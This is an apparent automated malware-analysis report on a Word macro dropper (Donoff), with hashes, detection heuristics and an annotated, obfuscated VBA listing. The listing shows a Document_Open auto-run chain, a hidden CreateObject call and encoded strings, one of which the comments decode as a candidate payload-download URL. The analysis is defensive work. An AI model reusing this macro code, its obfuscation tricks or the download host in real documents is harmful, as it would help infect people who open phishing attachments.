Donoff — Office (OLE) malware analysis

Static analysis result for SHA-256 ce78e8bfcc2fa4ef…

MALICIOUS

Office (OLE)

103.5 KB Created: 2016-05-31 21:34:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: 0771d88eb328af0c28bff73620c4f6ce SHA-1: a592c874ab2f6f109bd9619c7d64bb3d39c6c148 SHA-256: ce78e8bfcc2fa4ef04c9b83815b72e1b4153b7bbfc4264d4d85981422245dba1
242 Risk Score

Malware Insights

Donoff · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic · T1566.001 Phishing: Spearphishing Attachment · T1203 Exploitation for Client Execution — note: the static findings below show only a Document_Open macro that runs when the user opens the file, which is T1204.002 User Execution: Malicious File rather than an exploit; T1203 is not supported by the evidence on this page.

The file contains VBA macros. ThisDocument has a Document_Open auto-exec procedure that calls jEvmGvhtVJWZ.kTCWjU; that procedure runs under an empty On Error handler (any run-time failure ends the macro silently, so the victim sees no error dialog) and continues into lMdfkjFy and QvXwf. That chain passes three encoded string literals through a decoder (BOKWxMMrFkr.iKBNbg) whose body lies past the end of the preview below, and a public wrapper (mshXOCr) calls CreateObject with a ProgID supplied by its caller; the CallByName use reported by the heuristics is not among the visible lines. Most of the remaining procedures are never referenced and call names that do not exist in the extracted source — obfuscation filler. The ClamAV detection 'Doc.Dropper.Donoff-5743527-0' further supports this, indicating a dropper likely intended to download and execute a secondary payload. Because the decoder and the helper modules it calls (ttVXuQ, YovrSSgvMPJO, IGprEAKJAuxR, IyVrcDHGq) are outside the preview, the decoded URL and ProgID must be recovered by running or emulating iKBNbg against the three encoded strings before they are used as indicators.

Heuristics 7

  • ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography — in document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml — in document text (OLE body)
    All three are standard OOXML namespace URIs present in ordinary Word documents; they are not network indicators and should not be blocked or hunted on. No URL was extracted from the macro itself — the macro's strings are encoded (see the decoder calls in the listing below).

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19104 bytes
SHA-256: cb1ddb73da06febebf0a5877dc51319a3a1033d60bc7b44025ecafdd01d9de6e
Preview script
First 1,000 lines of the extracted script (the listing is cut off partway through module BOKWxMMrFkr, so the string decoder iKBNbg referenced by the code is not shown).
' Module attributes for the Word ThisDocument class module, as extracted by
' olevba. These lines are metadata, not executable code; the module is
' template-derived (VB_TemplateDerived = True), i.e. a normal Word document
' module, which is what lets the Document_Open handler below fire on open.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Filler procedure. Not called from any procedure in this listing, and every
' name it invokes (JBGCrVx, eklaYYxB, XRTLmWclX, tlwOUP, Jfqiww, DeMBErMM,
' ogQaKhB, VPqSaCwywvi, iVcFllAOL, dLXNRHI) is undefined in the extracted
' source; the assignments go to undeclared variables that are never read
' again. Presumably obfuscation padding to dilute signature and call-graph
' analysis — it carries no payload logic.
Private Sub WyyWULWYSi(ByVal OBEdkizvIqANSj As String, ByVal iTcptNtitkX As Integer)
JBGCrVx True, "61wH1rFeSckSe4WmjgC", 9044
eklaYYxB "BqJ9zUcRjgcgRXBEcoKmoRJv88HLj", "EFyjiZ4NyH7nAqOXr"
XRTLmWclX
LFMitxQT = 6741
If tlwOUP("7uSQTjm0DKEmrUbeqOAlOqe3SA2XSf", 886, 440) Then
FVoXCU = 9024
Jfqiww
DeMBErMM 1883
qfmfnUhU = 3192
ogQaKhB "E7H3kjiKQlrB4uz4hY"
yxvDZxGOono = "4V9Prmqq5pp2T3boDTt53SgVtZp6FwX"
Else
VPqSaCwywvi 653, 5024, 4694
iVcFllAOL "XSzIiqG023tL0tBudBlk88rPScG3D", 9258
dLXNRHI
UDjzxhB = False
End If
End Sub
' Filler procedure, same pattern as WyyWULWYSi: unreferenced, and all callees
' (zLRlicMtXXKlV, HTcopEWFEd, TZLddMcA, MeckKl, wsMERaKf, LscCUh,
' sDTkJvthsychG) are undefined in the extracted source. The string literals
' here are never fed to the decoder used by the real chain below.
Private Sub gfKVhnpWu(ByVal XjlJlQPCcmrv As Integer)
zLRlicMtXXKlV "rOrKUsrEkpwsCCW33P41pQu8ZoooG", "0WaQ7ihJDYiixj5e3T6XklW4P7TxHqn", "WBbZEwbE7I4LWwSJRi7zx0Nln"
vHqrgNeYdpuy = 358
HTcopEWFEd
RdzhvqvlE = "xLVtiCYc7iFsaEsELLyxuwRS2Di"
If TZLddMcA(True, 55, True) Then
alkeJPfCbUMBdm = 4069
MeckKl 555, "z8MCplodnJF9rbC7h8GUk", 2131
dQGWuKA = "pDgH1VBPv1VycHgrWtVCcIFdtPlSYW"
wsMERaKf
Else
LscCUh
sDTkJvthsychG 9355
IAQqnKpk = "Hfn8wNq6VVqVQpYvlNlGkhUODToBp"
End If
End Sub
' Auto-execution entry point: Word runs this when the document is opened
' (the OLE_VBA_DOCOPEN finding). Both locals are declared and never used;
' the only real work is the single call into standard module jEvmGvhtVJWZ.
Private Sub Document_Open()
Dim plTZdPka As Integer
Dim ncigYiQhft As Boolean
jEvmGvhtVJWZ.kTCWjU   ' -> kTCWjU, the start of the dropper chain
End Sub

' Standard module jEvmGvhtVJWZ: holds the live chain reached from
' Document_Open (kTCWjU -> lMdfkjFy -> QvXwf), the CreateObject wrapper
' mshXOCr and the three encoded-string accessors, plus more filler.
Attribute VB_Name = "jEvmGvhtVJWZ"
' Filler: unreferenced, callees FgpUGo and qllxLM are undefined in the
' extracted source, and xAfBi is an undeclared variable that is never read.
Private Sub SPmuRuORMlor(ByVal HgIZusrEmlYCXQ As String, ByVal EBQLGMY As String)
FgpUGo "EGD1Z1OQJ8AZSdcOhhc"
xAfBi = "fB9G2pgh9CloiivBucrFwQojd2Wa"
qllxLM "dQgTZOvp02GroYMHMWLo62TWcsxzRY", "8ojFpr5Fio5WOJgO1pNLTO", True
End Sub
' Filler: unreferenced; uAPgblLe, CNDhphipo and LBgHikUSTuk are undefined in
' the extracted source and the two assignments are to write-only undeclared
' variables.
Private Sub SPIypoc(ByVal PpSewz As Integer, ByVal qdFDWQxu As String)
uAPgblLe 3110
jPjtiINzaY = 6371
CNDhphipo "A78Ku2RnJsbgaamys", "G6AkAjTKsKWIwp48BaH0ctXRvlKgDH"
IhvwV = True
LBgHikUSTuk
End Sub
' Filler: unreferenced, three bare calls to names (bqrshfOOnObQar, sJhKGp,
' AXJwRmSPOAkc) that do not exist in the extracted source; parameters unused.
Private Sub bVdQWOlL(ByVal ozcccogqQJ As String, ByVal QOBsDKJS As Boolean)
bqrshfOOnObQar
sJhKGp
AXJwRmSPOAkc
End Sub
' Thin wrapper around CreateObject (the OLE_VBA_CREATEOBJ finding). The ProgID
' is supplied by the caller as pEarGnj — it is not a literal anywhere in the
' visible source — and the created object is passed through the identity
' function QFzYcmJViwYIP, presumably so that a plain grep for
' "CreateObject(" followed by a string does not hit. The second parameter and
' both locals are unused. No caller appears in this preview (likely in module
' ttVXuQ or another module past the cut-off), so the ProgID cannot be
' recovered from these lines alone.
Public Function mshXOCr(ByVal pEarGnj As String, ByVal TUvONr As String) As Object
Dim jRxEbKDa As Integer
Dim XCZIIIHPUk As String
Set mshXOCr = QFzYcmJViwYIP(CreateObject(pEarGnj))
End Function
' First stage of the chain, reached from ThisDocument.Document_Open. Calls two
' procedures in module ttVXuQ (not present in this preview) and then
' lMdfkjFy, which feeds the decoded strings into QvXwf. The error handler
' label slDgQgrOOSTgn has no statements, so any run-time error anywhere in the
' chain simply ends the procedure: the victim never sees a VBA error dialog
' and a failed download or object creation leaves no visible trace. Both
' locals are unused.
Public Sub kTCWjU()
Dim VYJDCDbnTrw As String
Dim mPVZLmKXRSHyBt As Integer
On Error GoTo slDgQgrOOSTgn
ttVXuQ.YIuXEJoscsaj
ttVXuQ.MIYUXhxY
lMdfkjFy
Exit Sub
slDgQgrOOSTgn:
End Sub
' Filler: unreferenced; AHuyFwATrHBOv, KPWbwiTHxKEiL, fsfyAnHlp, LhbSRruW,
' CJAzEj and jFyGoZAutdqkGd are all undefined in the extracted source. The
' literals here never reach the decoder used by the real chain.
Private Sub nsYPZNJ(ByVal fdgeL As String)
iUzhs = "KmYsR7JIDoubdQl14wrvbBok"
If AHuyFwATrHBOv Then
KPWbwiTHxKEiL False, "T5LdCaD3BwhlO844SJbShL2kXiAvn8"
fsfyAnHlp
LhbSRruW True
Else
CJAzEj 2123
End If
jFyGoZAutdqkGd "qhW0gCWZu7fR2FUiyWYD0lpxokEuO1", 972
End Sub
' Identity pass-through: returns its object argument unchanged. Its only
' purpose in the visible code is to sit between CreateObject and the
' assignment in mshXOCr. The local is unused.
Private Function QFzYcmJViwYIP(ByVal wBCzXKPHCoZf As Object) As Object
Dim qvVvJqxo As Integer
Set QFzYcmJViwYIP = wBCzXKPHCoZf
End Function
' Consumer of the decoded strings. vravubiPvDRh (third argument; lMdfkjFy
' passes the decoded value of BnLAMbzZZAofvM) goes with a True flag into
' YovrSSgvMPJO.QceWTMEJaYLCQj, whose result is kept as an object; that object
' is then handed to two further calls that also take the decoded values of
' CfMkynEbhSr and HBgZTg. Modules YovrSSgvMPJO, IGprEAKJAuxR and IyVrcDHGq are
' not in this preview, so what these calls actually do (fetch? write to disk?
' launch?) cannot be confirmed from the visible lines — only that the decoded
' strings and the object flow through them. ZTutrQVKg is never used;
' HnOErTetEaKlM is forwarded as the last argument of pugilrQ.
Private Sub QvXwf(ByVal HnOErTetEaKlM As String, ByVal ZTutrQVKg As String, ByVal vravubiPvDRh As String)
Set vzvwrEQSoD = YovrSSgvMPJO.QceWTMEJaYLCQj(True, vravubiPvDRh)
YovrSSgvMPJO.MMhiDsZmghwW CfMkynEbhSr, 2670, "arguyw2nGgGkc6QAe5NL", vzvwrEQSoD
IGprEAKJAuxR.pugilrQ IyVrcDHGq.TaoElp(HBgZTg, vzvwrEQSoD, 8879), False, "cejo7MPw6YS1LmNofeBzpX", HnOErTetEaKlM
End Sub
' Last step called from kTCWjU. Passes IGprEAKJAuxR.SxhCKi (a member of a
' module outside this preview), a fixed string, and the decoded value of
' BnLAMbzZZAofvM into QvXwf, then makes one more call on IGprEAKJAuxR with the
' same SxhCKi value. VLjTCnVrJU is declared and never used.
Private Sub lMdfkjFy()
Dim VLjTCnVrJU As Boolean
QvXwf IGprEAKJAuxR.SxhCKi, "jh1u3B528NFiUmAXx8lNtG5R0EI", BnLAMbzZZAofvM
IGprEAKJAuxR.ukYSHemkFaQeJd False, 618, IGprEAKJAuxR.SxhCKi
End Sub
' Encoded-string accessor #1: returns BOKWxMMrFkr.iKBNbg(payload, key). The
' decoder body is past the end of this preview, so the algorithm is not
' confirmed. NOTE(review): if iKBNbg simply drops every character of its
' second argument from the first, this literal reads "Can't download binary
' file" — an error string, consistent with a download routine. Verify by
' running the decoder before relying on it.
Private Function CfMkynEbhSr() As String
CfMkynEbhSr = BOKWxMMrFkr.iKBNbg("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
' Encoded-string accessor #2, used as the first argument of
' IyVrcDHGq.TaoElp in QvXwf. NOTE(review): under the same "strip the key's
' characters" reading as above this literal resolves to "ResponseBody", a
' property name — which would fit a CallByName on a download object (the
' OLE_VBA_CALLBYNAME finding) and explain why the property never appears as
' a bare identifier. Unverified: the decoder and the CallByName site are not
' in the visible lines.
Private Function HBgZTg() As String
HBgZTg = BOKWxMMrFkr.iKBNbg("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
' Encoded-string accessor #3, the value lMdfkjFy passes as the third argument
' of QvXwf. Visibly contains "//" and ":" with the key characters
' interleaved, i.e. this is where the download URL is kept. NOTE(review):
' under the "strip the key's characters" reading the literal resolves to an
' http:// URL with a .data path (candidate: http://britcart.com/britstar/
' office12.data). Treat that as unconfirmed until the decoder has been run;
' do not publish it as an IOC on the strength of this listing alone.
Private Function BnLAMbzZZAofvM() As String
BnLAMbzZZAofvM = BOKWxMMrFkr.iKBNbg("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function

' Standard module BOKWxMMrFkr: holds the string decoder iKBNbg called by the
' three accessors above. The preview is cut off a few lines into this
' module, so the decoder body is not visible here.
Attribute VB_Name = "BOKWxMMrFkr"
Private Function eVoEHMFWcUs(ByVal LVWIVzceQWVK As Integer, ByVal yVbFEr As Integer, ByVal agcsvDDW As String, ByVal MYcew As String) As String
If Not FxqHauXhrNAYyw.YcJR
... (truncated)